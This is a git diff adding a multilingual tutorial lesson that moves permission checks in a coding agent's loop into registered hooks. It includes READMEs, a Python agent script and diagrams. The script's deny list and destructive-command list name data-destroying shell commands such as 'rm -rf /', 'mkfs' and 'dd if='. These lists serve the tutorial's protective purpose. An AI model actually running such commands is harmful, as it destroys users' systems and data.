ループはもうチェック関数を直接呼び出さず、代わりに `trigger_hooks("PreToolUse", block)` を呼び、登録済みのフックが何を実行するかを決める。 + +4 つのイベントで、完全な agent cycle をカバー: + +| イベント | 発火タイミング | 典型的な用途 | +|----------|--------------|-------------| +| UserPromptSubmit | ユーザー入力後、LLM に入る前 | 入力バリデーション、コンテキスト注入 | +| PreToolUse | ツール実行前 | 権限チェック、ログ記録 | +| PostToolUse | ツール実行後 | 自動 git add、結果の後処理 | +| Stop | ループが終了する直前 | 強制続行、クリーンアップ | + +拡張の追加 = `register_hook()`。ループは変わらない。 + +--- + +## 仕組み + +**フック登録簿** — イベント名をコールバックリストにマッピングする辞書: + +```python +HOOKS = { + "UserPromptSubmit": [], + "PreToolUse": [], + "PostToolUse": [], + "Stop": [], +} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: # 戻り値 ≠ None → フックが「止め」と指示 + return result + return None +``` + +**UserPromptSubmit** — ユーザー入力後、LLM に入る前に発火。コンテキストの注入や入力の横取りが可能: + +```python +def context_inject_hook(query: str) -> str | None: + """Inject current working directory info into every prompt.""" + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None # return None = 変更なし、プロンプトを通す + +register_hook("UserPromptSubmit", context_inject_hook) +``` + +メインループでは、ユーザー入力直後に発火: + +```python +query = input("s04 >> ") +trigger_hooks("UserPromptSubmit", query) # ← LLM に入る前 +history.append({"role": "user", "content": query}) +agent_loop(history) +``` + +**PreToolUse / PostToolUse** — ツール実行の前後のフック。s03 の権限チェックロジックは PreToolUse フックに包まれ、さらにログフックと大出力リマインダーが追加される: + +```python +# PreToolUse: 権限チェック(s03 のロジック、ループからフックに移動) +def permission_hook(block): + if block.name == "bash": + for pattern in DENY_LIST: + if pattern in block.input.get("command", ""): + return "Permission denied by deny list" + if block.name in ("write_file", "edit_file"): + path = block.input.get("path", "") + if not path.startswith(str(WORKDIR)): + choice = input(" Allow? [y/N] ").strip().lower() + if choice not in ("y", "yes"): + return "Permission denied by user" + return None + +# PreToolUse: ログ +def log_hook(block): + print(f"[HOOK] {block.name}(...)") + +# PostToolUse: 大ファイルリマインダー +def large_output_hook(block, output): + if len(str(output)) > 100000: + print(f"[HOOK] ⚠ Large output from {block.name}") + +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("PostToolUse", large_output_hook) +``` + +**Stop** — ループが終了する直前に発火(`stop_reason != "tool_use"`)。終了を阻止、強制続行、またはクリーンアップが可能: + +```python +def summary_hook(messages: list) -> str | None: + """Print a summary when the loop is about to stop.""" + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None # return None = 終了を許可、return 文字列 = 強制続行 + +register_hook("Stop", summary_hook) +``` + +agent_loop 内では、終了前に発火: + +```python +if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) # ← 終了する前に + if force: + # フックがメッセージを返した → 注入して続行 + messages.append({"role": "user", "content": force}) + continue + return +``` + +**ループ内で変更されたのは一箇所だけ** — s03 は直接 `check_permission(block)` を呼び出していたが、s04 は `trigger_hooks("PreToolUse", block)` に置き換えた: + +```python +for block in response.content: + if block.type != "tool_use": + continue + + # s03: if not check_permission(block): ... + # s04: フックがハードコードを代替 + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) +``` + +4 つのフックが agent cycle の全重要ノードをカバー:入力→実行前→実行後→終了。ループ自体は永遠に綺麗なまま。 + +--- + +## s03 からの変更 + +| コンポーネント | 変更前 (s03) | 変更後 (s04) | +|--------------|-------------|-------------| +| 拡張方式 | check_permission() をループ内にハードコード | HOOKS 登録簿 + trigger_hooks() | +| 新規関数 | — | register_hook, trigger_hooks | +| フックコールバック | — | context_inject_hook, permission_hook, log_hook, large_output_hook, summary_hook | +| ループ | check_permission() を直接呼び出し | trigger_hooks("PreToolUse", ...) を呼び出し | +| 終了制御 | なし | trigger_hooks("Stop", ...) が終了を阻止可能 | +| 入力横取り | なし | trigger_hooks("UserPromptSubmit", ...) がコンテキスト注入可能 | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s04_hooks/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Read the file README.md`(そのまま通過するはず — フックログを観察) +2. `Create a file called test.txt`(作成後、PostToolUse が発火するか観察) +3. `Delete all temporary files in /tmp`(bash + rm で権限フックが発動) + +観察のポイント:各ツール実行前に `[HOOK]` ログが表示されるか? 権限が拒否されたとき、フックが拦截したのか、ループ内のハードコードが拦截したのか? + +--- + +## 次へ + +Agent は安全に操作を実行できるようになった。しかし「まず何をして、次に何をすべきか」を立ち止まって考えたことはあるか? 複雑なタスクを与えたとき、突っ走るのか、まず計画を立てるのか? + +→ s05 TodoWrite:Agent に計画ツールを与える。まずリストを作り、それから実行。完了率が倍増する。 + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `toolHooks.ts`(650 行)、`hooks.ts`、`stopHooks.ts`、`coreTypes.ts` の完全分析に基づく。 + +### 一、Hook イベント:2 つではなく 27 個 + +教育版は PreToolUse と PostToolUse のみを取り上げる。CC には実際に 27 のフックイベントがある(`coreTypes.ts:25-53`): + +| カテゴリ | イベント | +|----------|---------| +| ツール関連 | `PreToolUse`, `PostToolUse`, `PostToolUseFailure` | +| セッション関連 | `SessionStart`, `SessionEnd`, `Stop`, `StopFailure`, `Setup` | +| ユーザー対話 | `UserPromptSubmit`, `Notification`, `PermissionRequest`, `PermissionDenied` | +| サブエージェント | `SubagentStart`, `SubagentStop` | +| 圧縮関連 | `PreCompact`, `PostCompact` | +| チーム関連 | `TeammateIdle`, `TaskCreated`, `TaskCompleted` | +| その他 | `Elicitation`, `ElicitationResult`, `ConfigChange`, `WorktreeCreate`, `WorktreeRemove`, `InstructionsLoaded`, `CwdChanged`, `FileChanged` | + +教育版は 4 つのコアイベント(UserPromptSubmit、PreToolUse、PostToolUse、Stop)のみを取り上げる。これらで agent cycle の重要ノードを全てカバーできる。残り 23 個は同じパターン。 + +### 二、HookResult の完全フィールド + +CC の `HookResult`(`types/hooks.ts:260-275`)には 13 のフィールドがある: + +| フィールド | 型 | 用途 | +|-----------|-----|------| +| `message` | Message | オプションの UI メッセージ | +| `blockingError` | HookBlockingError | ブロッキングエラー → 会話に注入してモデルが自己修正 | +| `outcome` | success/blocking/non_blocking_error/cancelled | 実行結果 | +| `preventContinuation` | boolean | 後続実行を阻止 | +| `stopReason` | string | 停止理由の説明 | +| `permissionBehavior` | allow/deny/ask/passthrough | フックが権限決定を返す | +| `updatedInput` | Record | ツール入力の変更 | +| `additionalContext` | string | 追加コンテキスト | +| `updatedMCPToolOutput` | unknown | MCP ツール出力の変更 | + +### 三、重要な不変条件:Hook 'allow' は deny/ask ルールをバイパスできない + +これは CC 権限システムで最も重要なセキュリティ設計(`toolHooks.ts:325-331`):**フックが allow を返しても、settings.json の deny/ask ルールをチェックする。** ユーザーのフックスクリプトが「許可」と言っても、settings.json でそのツールが無効になっていれば、操作は阻止される。 + +教育版にはこの階層がない — フックが非 None を返せば直接中断。教育目的では十分だが、本番環境ではセキュリティホールになる。 + +### 四、stopHookActive 機構 + +CC の Stop フックには無限ループ防止機構がある(`query.ts:212,1300`):`stopHookActive` 状態フィールド。Stop フックが blockingError を発生させると、ループは `stopHookActive: true` で次のラウンドに再入する。後続のイテレーションではこのフラグを見て Stop フックを再トリガーしない。これで「永久に止まらない」バグを防ぐ — モデルが自己修正 → Stop フックが再度エラー → モデルが再修正 → Stop フックが再度エラー... を防止。 + +### 五、hook_stopped_continuation + +PostToolUse フックが `preventContinuation: true` を返すと、`hook_stopped_continuation` アタッチメントが生成される(`toolHooks.ts:117-130`)。query.ts(L1388-1393)はそれを検出して `shouldPreventContinuation = true` を設定し、ループが終了する。これは「フックが Agent を優雅に停止させる」機構 — クラッシュではなく、完了。 + +### 教育版の簡略化は意図的 + +- 27 イベント → 4(UserPromptSubmit/PreToolUse/PostToolUse/Stop):agent cycle の重要ノードをカバー +- 13 フィールド → 単純な戻り値(None = 続行、非 None = 中断/続行):認知負荷を最小限に +- Hook allow vs deny/ask の不変条件 → 省略:教育版に settings.json 層はない +- stopHookActive → 省略:教育版の Stop フックは単純な続行のみ、無限ループ防止は不要 + +
+ + diff --git a/s04_hooks/README.md b/s04_hooks/README.md new file mode 100644 index 000000000..e41bbe047 --- /dev/null +++ b/s04_hooks/README.md @@ -0,0 +1,280 @@ +# s04: Hooks — 挂在循环上,不写进循环里 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → `s04` → [s05](../s05_todo_write/) → s06 → ... → s19 + +> *"挂在循环上, 不写进循环里"* — 钩子在工具执行前后注入扩展逻辑。 +> +> **Harness 层**: 钩子 — 扩展点不侵入循环。 + +--- + +## 问题 + +s03 的 Agent 有权限检查了。但每次加一个新检查——比如"记录每次 bash 调用"、"操作后自动 git add"——都要修改 `agent_loop` 函数。 + +循环很快就变成了这样: + +```python +def agent_loop(messages): + while True: + # ... LLM call ... + for block in response.content: + if block.type == "tool_use": + log_to_file(block) # 加一行 + check_permission(block) # 加一行 + notify_slack(block) # 又加一行 + output = execute(block) + auto_git_add(block) # 再加一行 + # ... 很快循环就认不出来了 +``` + +你想扩展的是 Agent 的行为,但你改的却是循环本身。循环应该是一个稳定的核心,扩展应该挂在外面。 + +--- + +## 解决方案 + +![Hooks Overview](images/hooks-overview.svg) + +s03 的循环和权限逻辑完全保留。唯一的变动是把 `check_permission()` 从循环体内移到了钩子上——循环不再直接调用任何检查函数,改为 `trigger_hooks("PreToolUse", block)`,由注册表决定跑什么。 + +四个事件,覆盖一个完整的 agent cycle: + +| 事件 | 触发时机 | 典型用途 | +|------|---------|---------| +| UserPromptSubmit | 用户输入提交后、进入 LLM 前 | 输入验证、注入上下文 | +| PreToolUse | 工具执行前 | 权限检查、日志记录 | +| PostToolUse | 工具执行后 | 自动 git add、结果后处理 | +| Stop | 循环即将退出时 | 强制续跑、收尾清理 | + +加一个扩展 = `register_hook()`,循环不改。 + +--- + +## 工作原理 + +**钩子注册表**——一个字典,事件名映射到回调列表: + +```python +HOOKS = { + "UserPromptSubmit": [], + "PreToolUse": [], + "PostToolUse": [], + "Stop": [], +} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: # 返回值 ≠ None → 钩子说"停" + return result + return None +``` + +**UserPromptSubmit**——用户输入提交后、进入 LLM 前触发。可以注入上下文或拦截输入: + +```python +def context_inject_hook(query: str) -> str | None: + """Inject current working directory info into every prompt.""" + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None # return None = no modification, let prompt through + +register_hook("UserPromptSubmit", context_inject_hook) +``` + +在主循环中,用户输入后立即触发: + +```python +query = input("s04 >> ") +trigger_hooks("UserPromptSubmit", query) # ← 进入 LLM 之前 +history.append({"role": "user", "content": query}) +agent_loop(history) +``` + +**PreToolUse / PostToolUse**——工具执行前后的钩子。s03 的权限检查逻辑现在包装成 PreToolUse 钩子,再加一个日志钩子和一个大输出提醒: + +```python +# PreToolUse: 权限检查(s03 的逻辑,从循环移到钩子) +def permission_hook(block): + if block.name == "bash": + for pattern in DENY_LIST: + if pattern in block.input.get("command", ""): + return "Permission denied by deny list" + if block.name in ("write_file", "edit_file"): + path = block.input.get("path", "") + if not path.startswith(str(WORKDIR)): + choice = input(" Allow? [y/N] ").strip().lower() + if choice not in ("y", "yes"): + return "Permission denied by user" + return None + +# PreToolUse: 日志 +def log_hook(block): + print(f"[HOOK] {block.name}(...)") + +# PostToolUse: 大文件提醒 +def large_output_hook(block, output): + if len(str(output)) > 100000: + print(f"[HOOK] ⚠ Large output from {block.name}") + +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("PostToolUse", large_output_hook) +``` + +**Stop**——循环即将退出时触发(`stop_reason != "tool_use"`)。可以阻止退出、强制续跑,或做收尾清理: + +```python +def summary_hook(messages: list) -> str | None: + """Print a summary when the loop is about to stop.""" + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None # return None = allow stop, return string = force continuation + +register_hook("Stop", summary_hook) +``` + +在 agent_loop 中,退出前触发: + +```python +if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) # ← 退出之前 + if force: + # hook returned a message → inject it and continue + messages.append({"role": "user", "content": force}) + continue + return +``` + +**循环里只改了一处**——s03 直接调用 `check_permission(block)`,s04 改为 `trigger_hooks("PreToolUse", block)`: + +```python +for block in response.content: + if block.type != "tool_use": + continue + + # s03: if not check_permission(block): ... + # s04: 钩子替代硬编码 + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) +``` + +四个钩子覆盖了 agent cycle 的全部关键节点:输入→执行前→执行后→退出。循环本身永远干净。 + +--- + +## 相对 s03 的变更 + +| 组件 | 之前 (s03) | 之后 (s04) | +|------|-----------|-----------| +| 扩展方式 | check_permission() 硬编码在循环里 | HOOKS 注册表 + trigger_hooks() | +| 新函数 | — | register_hook, trigger_hooks | +| 钩子回调 | — | context_inject_hook, permission_hook, log_hook, large_output_hook, summary_hook | +| 循环 | 直接调用 check_permission() | 调用 trigger_hooks("PreToolUse", ...) | +| 退出控制 | 无 | trigger_hooks("Stop", ...) 可阻止退出 | +| 输入拦截 | 无 | trigger_hooks("UserPromptSubmit", ...) 可注入上下文 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s04_hooks/code.py +``` + +试试这些 prompt: + +1. `Read the file README.md`(应该直接通过,观察钩子日志) +2. `Create a file called test.txt`(通过后观察 PostToolUse 是否触发) +3. `Delete all temporary files in /tmp`(bash + rm 触发权限钩子) + +观察重点:每次工具执行前,是否出现了 `[HOOK]` 日志?权限被拒时,是钩子拦截的还是循环里硬编码的? + +--- + +## 接下来 + +Agent 现在能安全执行操作了。但它有没有停下来想过"我应该先做什么,再做什么"?给它一个复杂任务,它是直接莽上去,还是先列个计划? + +s05 TodoWrite → 给 Agent 一个计划工具。先列清单,再做。完成率翻倍。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `toolHooks.ts`(650 行)、`hooks.ts`、`stopHooks.ts`、`coreTypes.ts` 的完整分析。 + +### 一、Hook 事件:不是 2 个,是 27 个 + +教学版只讲了 PreToolUse 和 PostToolUse。CC 实际有 27 个 hook 事件(`coreTypes.ts:25-53`): + +| 类别 | 事件 | +|------|------| +| 工具相关 | `PreToolUse`, `PostToolUse`, `PostToolUseFailure` | +| 会话相关 | `SessionStart`, `SessionEnd`, `Stop`, `StopFailure`, `Setup` | +| 用户交互 | `UserPromptSubmit`, `Notification`, `PermissionRequest`, `PermissionDenied` | +| 子 Agent | `SubagentStart`, `SubagentStop` | +| 压缩相关 | `PreCompact`, `PostCompact` | +| 团队相关 | `TeammateIdle`, `TaskCreated`, `TaskCompleted` | +| 其他 | `Elicitation`, `ElicitationResult`, `ConfigChange`, `WorktreeCreate`, `WorktreeRemove`, `InstructionsLoaded`, `CwdChanged`, `FileChanged` | + +教学版只讲 4 个核心事件(UserPromptSubmit、PreToolUse、PostToolUse、Stop),因为它们覆盖了一个完整 agent cycle 的关键节点。其他 23 个都是同样的模式。 + +### 二、HookResult 的完整字段 + +CC 的 `HookResult`(`types/hooks.ts:260-275`)有 13 个字段: + +| 字段 | 类型 | 用途 | +|------|------|------| +| `message` | Message | 可选 UI 消息 | +| `blockingError` | HookBlockingError | 阻塞错误 → 注入对话让模型自纠 | +| `outcome` | success/blocking/non_blocking_error/cancelled | 执行结果 | +| `preventContinuation` | boolean | 阻止后续执行 | +| `stopReason` | string | 停止原因描述 | +| `permissionBehavior` | allow/deny/ask/passthrough | 钩子返回权限决策 | +| `updatedInput` | Record | 修改工具输入 | +| `additionalContext` | string | 附加上下文 | +| `updatedMCPToolOutput` | unknown | MCP 工具输出修改 | + +### 三、关键不变式:Hook 'allow' 不能绕过 deny/ask 规则 + +这是 CC 权限系统最重要的安全设计(`toolHooks.ts:325-331`):**钩子返回 allow 时,仍然要检查 settings.json 的 deny/ask 规则**。即使用户的钩子脚本说"允许",如果在 settings.json 中禁用了这个工具,操作仍然会被阻止。 + +教学版没有这个层次——钩子返回非 None 就直接中断。这在教学场景中够了,但在生产环境中会形成安全漏洞。 + +### 四、stopHookActive 机制 + +CC 的 Stop hooks 有一个防无限循环机制(`query.ts:212,1300`):`stopHookActive` 状态字段。当 stop hooks 产生 blockingError 时,循环带 `stopHookActive: true` 重入下一轮。后续迭代中 stop hooks 看到这个标志就不会再次触发。这防止了一个永不停机的 bug——模型自纠后 stop hook 再次报错 → 模型再自纠 → stop hook 再报错... + +### 五、hook_stopped_continuation + +PostToolUse hooks 返回 `preventContinuation: true` 时,会产生一个 `hook_stopped_continuation` 附件(`toolHooks.ts:117-130`)。query.ts(L1388-1393)检测到后设置 `shouldPreventContinuation = true`,循环退出。这是"钩子优雅地让 Agent 停机"的机制——不是崩溃,是完成。 + +### 教学版的简化是刻意的 + +- 27 个事件 → 4 个(UserPromptSubmit/PreToolUse/PostToolUse/Stop):覆盖 agent cycle 关键节点 +- 13 个字段 → 简单的返回值(None = 继续,非 None = 中断/续跑):心智负担降到最低 +- Hook allow vs deny/ask 不变式 → 省略:教学版没有 settings.json 层 +- stopHookActive → 省略:教学版 Stop hook 只做简单续跑,不涉及防无限循环机制 + +
+ + diff --git a/s04_hooks/code.py b/s04_hooks/code.py new file mode 100644 index 000000000..47b5d4386 --- /dev/null +++ b/s04_hooks/code.py @@ -0,0 +1,290 @@ +#!/usr/bin/env python3 +""" +s04: Hooks — move extension logic out of the loop, onto hooks. + + User types query + │ + ▼ + ┌──────────────────┐ + │ UserPromptSubmit │ ── trigger_hooks() before LLM + └────────┬─────────┘ + ▼ + ┌────────────┐ ┌─────────────────────────────┐ + │ messages │────▶│ LLM (stop_reason?) │ + └────────────┘ │ No ──▶ Stop hooks ──▶ exit │ + │ Yes ──▶ tool_use block ──┐ │ + └────────────────────────────┘ │ + ▼ + ┌──────────────────┐ + │ trigger_hooks() │ + │ PreToolUse: │ + │ permission_hook │ + │ log_hook │ + └───────┬──────────┘ + │ (not blocked) + ┌───────▼──────────┐ + │ TOOL_HANDLERS[x] │ + └───────┬──────────┘ + │ + ┌───────▼──────────┐ + │ trigger_hooks() │ + │ PostToolUse: │ + │ large_output │ + └───────┬──────────┘ + │ + results ──▶ back to messages + +Changes from s03: + + HOOKS registry (event -> list of callbacks) + + register_hook() / trigger_hooks() + + context_inject_hook (UserPromptSubmit) + + permission_hook, log_hook (PreToolUse) + + large_output_hook (PostToolUse) + + summary_hook (Stop) + - check_permission() removed from loop body + (logic moved into permission_hook, triggered via PreToolUse) + +Run: python s04_hooks/code.py +Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') + readline.parse_and_bind('set input-meta on') + readline.parse_and_bind('set output-meta on') + readline.parse_and_bind('set convert-meta off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks. Act, don't explain." + + +# ═══════════════════════════════════════════════════════════ +# FROM s02-s03 (unchanged): Tool Implementations +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, +} + + +# ═══════════════════════════════════════════════════════════ +# NEW in s04: Hook System (s03 permission logic now via hooks) +# ═══════════════════════════════════════════════════════════ + +HOOKS = {"UserPromptSubmit": [], "PreToolUse": [], "PostToolUse": [], "Stop": []} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: # non-None return → abort + return result + return None + + +# s03 permission check logic, now wrapped as a hook +DENY_LIST = ["rm -rf /", "sudo", "shutdown", "reboot", "mkfs", "dd if="] +DESTRUCTIVE = ["rm ", "> /etc/", "chmod 777"] + +def permission_hook(block): + """PreToolUse: s03 check_permission() logic moved here.""" + if block.name == "bash": + for pattern in DENY_LIST: + if pattern in block.input.get("command", ""): + print(f"\n\033[31m⛔ Blocked: '{pattern}'\033[0m") + return "Permission denied by deny list" + for kw in DESTRUCTIVE: + if kw in block.input.get("command", ""): + print(f"\n\033[33m⚠ Potentially destructive command\033[0m") + print(f" Tool: {block.name}({block.input})") + choice = input(" Allow? [y/N] ").strip().lower() + if choice not in ("y", "yes"): + return "Permission denied by user" + if block.name in ("write_file", "edit_file"): + path = block.input.get("path", "") + if not path.startswith(str(WORKDIR)): + print(f"\n\033[33m⚠ Writing outside workspace\033[0m") + print(f" Tool: {block.name}({block.input})") + choice = input(" Allow? [y/N] ").strip().lower() + if choice not in ("y", "yes"): + return "Permission denied by user" + return None + +def log_hook(block): + """PreToolUse: log every tool call.""" + args_preview = str(list(block.input.values())[:2])[:60] + print(f"\033[90m[HOOK] {block.name}({args_preview})\033[0m") + return None + +def large_output_hook(block, output): + """PostToolUse: warn on large output.""" + if len(str(output)) > 100000: + print(f"\033[33m[HOOK] ⚠ Large output from {block.name}: {len(str(output))} chars\033[0m") + return None + +# UserPromptSubmit hook: log user input before it reaches the LLM +def context_inject_hook(query: str): + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None + +# Stop hook: print summary when loop is about to exit +def summary_hook(messages: list): + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None + +register_hook("UserPromptSubmit", context_inject_hook) +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("PostToolUse", large_output_hook) +register_hook("Stop", summary_hook) + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — same structure as s03, but no hard-coded check +# s03: if not check_permission(block): ... +# s04: if trigger_hooks("PreToolUse", block): ... +# ═══════════════════════════════════════════════════════════ + +def agent_loop(messages: list): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) + if force: + messages.append({"role": "user", "content": force}) + continue + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + + # s04 change: hook replaces hard-coded check_permission() + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) # s04: post hook + + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s04: Hooks — extension logic on hooks, loop stays clean") + print("Type a question, press Enter. Type q to quit.\n") + + history = [] + while True: + try: + query = input("\033[36ms04 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + trigger_hooks("UserPromptSubmit", query) + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s04_hooks/images/hooks-overview.en.svg b/s04_hooks/images/hooks-overview.en.svg new file mode 100644 index 000000000..5fa4995b5 --- /dev/null +++ b/s04_hooks/images/hooks-overview.en.svg @@ -0,0 +1,100 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Hooks — Extension Logic Hangs Outside, Loop Unchanged + + + + + + messages[] + (s01 preserved) + + + + + + + LLM + stop_reason? + + + + No + + Return Result + + + + Yes + + + + trigger_hooks() + PreToolUse + + permission_hook · log_hook + return non-None → block + + + + + Skip Execution + + + + Pass + + + + TOOL_ + HANDLERS + bash/read/... + + + + After exec + + + + trigger_hooks() + PostToolUse + + large_output_hook + + + + Results appended to messages[], loop continues + + + + s03: + if not check_permission(block): ... + ← every new check requires modifying the loop + s04: + blocked = trigger_hooks("PreToolUse", block) + ← add check = register_hook(), loop unchanged + diff --git a/s04_hooks/images/hooks-overview.ja.svg b/s04_hooks/images/hooks-overview.ja.svg new file mode 100644 index 000000000..6348c5ba5 --- /dev/null +++ b/s04_hooks/images/hooks-overview.ja.svg @@ -0,0 +1,100 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Hooks — 拡張ロジックは外側に、ループは一文字も変更しない + + + + + + messages[] + (s01 保持) + + + + + + + LLM + stop_reason? + + + + No + + 結果を返す + + + + Yes + + + + trigger_hooks() + PreToolUse + + permission_hook · log_hook + 非 None を返す → 中断 + + + + + 実行をスキップ + + + + 通過 + + + + TOOL_ + HANDLERS + bash/read/... + + + + 実行後 + + + + trigger_hooks() + PostToolUse + + large_output_hook + + + + 結果を messages[] に追加、ループ継続 + + + + s03: + if not check_permission(block): ... + ← チェックを追加するたびにループを修正 + s04: + blocked = trigger_hooks("PreToolUse", block) + ← チェック追加 = register_hook()、ループ不変 + diff --git a/s04_hooks/images/hooks-overview.svg b/s04_hooks/images/hooks-overview.svg new file mode 100644 index 000000000..6fe7d5f2a --- /dev/null +++ b/s04_hooks/images/hooks-overview.svg @@ -0,0 +1,100 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Hooks — 扩展逻辑挂在外面,循环本身一字不改 + + + + + + messages[] + (s01 保留) + + + + + + + LLM + stop_reason? + + + + + + 返回结果 + + + + + + + + trigger_hooks() + PreToolUse + + permission_hook · log_hook + 返回非 None → 中断 + + + + + 跳过执行 + + + + 通过 + + + + TOOL_ + HANDLERS + bash/read/... + + + + 执行后 + + + + trigger_hooks() + PostToolUse + + large_output_hook + + + + 结果追加到 messages[],循环继续 + + + + s03: + if not check_permission(block): ... + ← 每加一个检查就要改循环 + s04: + blocked = trigger_hooks("PreToolUse", block) + ← 加检查 = register_hook(),循环不改 + diff --git a/s05_todo_write/README.en.md b/s05_todo_write/README.en.md new file mode 100644 index 000000000..0d41b9924 --- /dev/null +++ b/s05_todo_write/README.en.md @@ -0,0 +1,155 @@ +# s05: TodoWrite — An Agent Without a Plan Drifts Off Course + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → 